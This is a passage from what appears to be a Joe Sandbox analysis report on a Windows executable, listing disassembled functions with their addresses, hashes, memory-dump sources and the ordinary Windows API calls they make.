                                                                                                  • Instruction Fuzzy Hash: 70C126B6A183818FC354CF29D88065AFBE1BFC8208F19892DE998D7311D734E955CF96
                                                                                                  Function 0091F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0091F3A5), ref: 0091F9DA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                  • String ID:
                                                                                                  • API String ID: 3192549508-0
                                                                                                  • Opcode ID: f994fc6062af0ce65039dc3a14431c3eef1d3168f51730b1c526d9ab36a4b57e
                                                                                                  • Instruction ID: eb57f775b3378133e4c1ff10c8a9f503d19c0991fb1ac80e39dbab779177086a
                                                                                                  • Opcode Fuzzy Hash: f994fc6062af0ce65039dc3a14431c3eef1d3168f51730b1c526d9ab36a4b57e
                                                                                                  • Instruction Fuzzy Hash:
                                                                                                  Function 0092C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 54951025-0
                                                                                                  • Opcode ID: c647cbcfac7ca5e00763d983f98d2e361d1a0c4d234aabd7e619cc0f6aa54dd0
                                                                                                  • Instruction ID: 30b3f11e90c2b4940db586e2d1e65228f57e4852a56827c9fcede550364cd32d
                                                                                                  • Opcode Fuzzy Hash: c647cbcfac7ca5e00763d983f98d2e361d1a0c4d234aabd7e619cc0f6aa54dd0
                                                                                                  • Instruction Fuzzy Hash: 3BA0113022E2008B83008F30AE082083AAAAA00282308802AA008C8020EAA080A0BB00
                                                                                                  Function 009162CA Relevance: .8, Instructions: 829COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                  • Instruction ID: 5d358d301347239c2444b941c55cf7cd28226e6b6565943af8cc6ec6351a4aaf
                                                                                                  • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                  • Instruction Fuzzy Hash: A362C871B047899FCB25CF28C4906F9BBE1AF95304F08896DD8EA8B346D734E985CB11
                                                                                                  Function 009177EF Relevance: .8, Instructions: 817COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                  • Instruction ID: da6283a229f013bef24258c7cef7d10690ab0dfd97fa037107024078f86b7c46
                                                                                                  • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                  • Instruction Fuzzy Hash: 0C62C57170C34A9FCB15CF68C8806A9FBF1AF95304F18896DE89A8B346D730E985CB55
                                                                                                  Function 0090F461 Relevance: .7, Instructions: 694COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                  • Instruction ID: f87e793a814143b63c6beef01497e7d2182bce7cdbf7a386a885ce8672822005
                                                                                                  • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                  • Instruction Fuzzy Hash: BA524B72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                                  Function 00917153 Relevance: .5, Instructions: 536COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 49012fb95aee48225fd24b8b3134dd5f1ada4f8db1ae7f49622f934726ea493b
                                                                                                  • Instruction ID: e4dc93811378abbaa3cd4ffda7743ff569d0174cc6124913039879dd902dc074
                                                                                                  • Opcode Fuzzy Hash: 49012fb95aee48225fd24b8b3134dd5f1ada4f8db1ae7f49622f934726ea493b
                                                                                                  • Instruction Fuzzy Hash: 6012B0B171870A9FC718CF68C490AB9F7F1FB98304F14892EE996C7680E734A995CB45
                                                                                                  Function 0090C426 Relevance: .5, Instructions: 454COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b819876e87db5704e986533dad419e1d5497c3173b5c77786d1b8c4c2774d28d
                                                                                                  • Instruction ID: 8eccc91b479667d5c0bacc14c0443989ffc9037d0c4af0168261dfc3c88ea6b5
                                                                                                  • Opcode Fuzzy Hash: b819876e87db5704e986533dad419e1d5497c3173b5c77786d1b8c4c2774d28d
                                                                                                  • Instruction Fuzzy Hash: 5CF18CB1A083028FC718CF28C49462ABBE5FFCA354F154B2EF495D7296D631E945CB46
                                                                                                  Function 00916CDC Relevance: .3, Instructions: 343COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog
                                                                                                  • String ID:
                                                                                                  • API String ID: 3519838083-0
                                                                                                  • Opcode ID: 2495ef6a23355a18da970d6c547b2796123da993164145060a2e990f862e0cda
                                                                                                  • Instruction ID: c2714243b85c824dfcaa1eab891fb06b18a770c6eabd632cd716f3e586f4ad8e
                                                                                                  • Opcode Fuzzy Hash: 2495ef6a23355a18da970d6c547b2796123da993164145060a2e990f862e0cda
                                                                                                  • Instruction Fuzzy Hash: 50D1C4B1B083498FDB14CF28C94079BBBE5BF89308F04496DE8899B342D774E985CB56
                                                                                                  Function 0090E9B7 Relevance: .3, Instructions: 320COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 842e7d676ff3391bd8b5b5c3b8b149674d521fb61f571f6597e620bb85657684
                                                                                                  • Instruction ID: 43e968a20217323ea6c39747f0325fd4b366037dd18cd5433f54f2090ba63ce2
                                                                                                  • Opcode Fuzzy Hash: 842e7d676ff3391bd8b5b5c3b8b149674d521fb61f571f6597e620bb85657684
                                                                                                  • Instruction Fuzzy Hash: 10E17DB951C3948FD314CF69D89086ABFF0AF8A300F45095EF9C497392C235EA19DB92
                                                                                                  Function 00914088 Relevance: .3, Instructions: 270COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                  • Instruction ID: 1c2862b5a423ca7b534152f9526a45dcede9d39e788f879e96149da24dd8a528
                                                                                                  • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                  • Instruction Fuzzy Hash: 3A9159B130434E9BDB24EB64D894BFA77D8EBA8300F104D2CF9A6872C1DA7495C6C752
                                                                                                  Function 009143BF Relevance: .2, Instructions: 243COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                  • Instruction ID: df740fd41267de350b462e0297f7861e8843be9d10a2d1fa1ca7d9b3ef4e27a4
                                                                                                  • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                  • Instruction Fuzzy Hash: 5281297130434A4FDB24DE68C8D1BFD77D5ABD9308F04492DF9868B2C2DA7489C68752
                                                                                                  Function 009251C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 09aa0131d04f5f8e5c63471c80a3e59a8555ed2637bea086c252efb60b39f57b
                                                                                                  • Instruction ID: b8303f9410b8e9e6c444b3fe31bae5d92bbba2429a77feb54966a797ee6edd29
                                                                                                  • Opcode Fuzzy Hash: 09aa0131d04f5f8e5c63471c80a3e59a8555ed2637bea086c252efb60b39f57b
                                                                                                  • Instruction Fuzzy Hash: 00618631A00F38E6CF38AA6878957BE239CEB41350F16191AE492DF2CDD2B5DC42C751
                                                                                                  Function 00924F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                  • Instruction ID: d09f03d26b60df7ec9d293aab6a9df504e3f8dc7b5056815bd4d051a8b7178ce
                                                                                                  • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                  • Instruction Fuzzy Hash: AB513661348F7457DB345928BA56BFF23CD9B86300F1A0819E987CB28FC639ED458396
                                                                                                  Function 0090EFE2 Relevance: .2, Instructions: 161COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d69f2f774ee9fbaef3fe1a362cf68eae87c9de679118f34c1b71fc2da4e239ac
                                                                                                  • Instruction ID: 86c6fa04cf2676ddd46e3476c53b6e2e855f8ec5bcc28d952e78b723073f0e71
                                                                                                  • Opcode Fuzzy Hash: d69f2f774ee9fbaef3fe1a362cf68eae87c9de679118f34c1b71fc2da4e239ac
                                                                                                  • Instruction Fuzzy Hash: 3251E23150C3958EC722CF24C1905AEBFF5AEDA314F0909A9E4D95B683C230DB4ACB62
                                                                                                  Function 009100B7 Relevance: .1, Instructions: 141COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 28edbb86d7946a97aed48fe6518c2be8c1f18fac245b84e9238e5e1051a510cb
                                                                                                  • Instruction ID: ad77808b9196d9a90b3eca79f868c847e95300d5da02e1f2461b2a6a1804f222
                                                                                                  • Opcode Fuzzy Hash: 28edbb86d7946a97aed48fe6518c2be8c1f18fac245b84e9238e5e1051a510cb
                                                                                                  • Instruction Fuzzy Hash: 9551E0B1A083159FC748CF19D48055AF7E1FF88314F058A2EE899E3300D735E999CB96
                                                                                                  Function 00913E0B Relevance: .1, Instructions: 112COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                  • Instruction ID: ffffd37b10bc10d7d6c1d9474f735ac360571f915c2b0d93c8be7128b006a14e
                                                                                                  • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                  • Instruction Fuzzy Hash: B23118B1B1474A8FCB14DF28C8512AEBBE0FB95314F14892DE889D7341C734EA4ACB91
                                                                                                  Function 0090E2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _swprintf.LIBCMT ref: 0090E30E
                                                                                                    • Part of subcall function 00904092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009040A5
                                                                                                    • Part of subcall function 00911DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00941030,00000200,0090D928,00000000,?,00000050,00941030), ref: 00911DC4
                                                                                                  • _strlen.LIBCMT ref: 0090E32F
                                                                                                  • SetDlgItemTextW.USER32(?,0093E274,?), ref: 0090E38F
                                                                                                  • GetWindowRect.USER32(?,?), ref: 0090E3C9
                                                                                                  • GetClientRect.USER32(?,?), ref: 0090E3D5
                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0090E475
                                                                                                  • GetWindowRect.USER32(?,?), ref: 0090E4A2
                                                                                                  • SetWindowTextW.USER32(?,?), ref: 0090E4DB
                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 0090E4E3
                                                                                                  • GetWindow.USER32(?,00000005), ref: 0090E4EE
                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0090E51B
                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 0090E58D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
